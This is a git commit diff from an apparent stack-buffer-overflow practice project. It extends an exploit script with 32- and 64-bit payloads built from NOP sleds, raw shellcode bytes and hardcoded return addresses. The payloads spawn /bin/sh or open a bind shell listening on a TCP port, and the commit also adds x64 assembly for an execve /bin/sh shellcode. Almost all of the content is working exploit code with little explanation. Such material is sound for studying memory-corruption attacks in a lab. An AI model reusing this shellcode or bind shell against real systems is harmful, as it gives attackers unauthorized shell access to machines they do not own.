diff options
| author | toni <matzeton@googlemail.com> | 2015-04-12 17:21:18 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2015-04-12 17:21:18 +0200 |
| commit | bd18cd8c67fd97f6bf0dceffae68799730ec582c (patch) | |
| tree | 43adc08e921768ac116c205444a2a6050199d245 | |
| parent | 48ed2c30cac4c144690ddf5e56c6b366636184f0 (diff) | |
exploiting x64's as well
| -rw-r--r-- | Makefile | 2 | ||||
| -rwxr-xr-x | exploit.sh | 14 | ||||
| -rw-r--r-- | shellcode/execve_x64.asm | 20 |
3 files changed, 33 insertions, 3 deletions
@@ -30,6 +30,8 @@ ifeq ($(LBITS),64) -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $@_x64 $< endif +rebuild: clean all + clean: $(RM) -f *.o $(RM) -f $(TARGETS) $(patsubst %,%_x64,$(TARGETS)) @@ -2,25 +2,33 @@ # shellcode generated with metasploit (exec /bin/sh): # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' -# return addr ./overflow (x86): 0xbffff412 +# uses (currently) only self-written shellcode .. if [ -z "$1" ]; then echo "$0 [local|bind]" exit 1 fi -echo "$0: exec exploit .." +echo "$0: exec exploit ( x$(getconf LONG_BIT) ) .." if [ "$1" = "local" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr # uses own shellcode: shellcode/hello.asm (x86-nasm) ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'` + else + # 133xNOP + shellcode(34) + 145xNOP + return addr + # uses own shellcode: shellcode/execve_x64.o + ./overflow_x64 `python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "\x02\xe7\xff\xff\xff\x7f"'` fi elif [ "$1" = "bind" ]; then if [ $(getconf LONG_BIT) -eq 32 ]; then - # 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP + return addr + # 85xNOP + shellcode(134) + 85xNOP + return addr # uses own shellcode: shellcode/socket.asm (x86-nasm) ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'` + else + # 100xNOP + shellcode(149) + 63xNOP + return addr + # uses own shellcode: shellcode/socket_x64.asm (x64-nasm) + ./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05" + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'` fi else $0 diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm new file mode 100644 index 0000000..6048796 --- /dev/null +++ b/shellcode/execve_x64.asm @@ -0,0 +1,20 @@ +BITS 64 + + +; do the 'string trick' +jmp short string + +code: +xor rax,rax +pop rdi ; pop the addr of the string intro esi (stack pointer register) +mov byte [rdi + 7], al ; null-terminate the string +push rdi +mov rsi,rsp +push rax +mov rdx,rsp +mov byte al,59 ; execv +syscall + +string: +call code +db '/bin/sh' , 0xFF |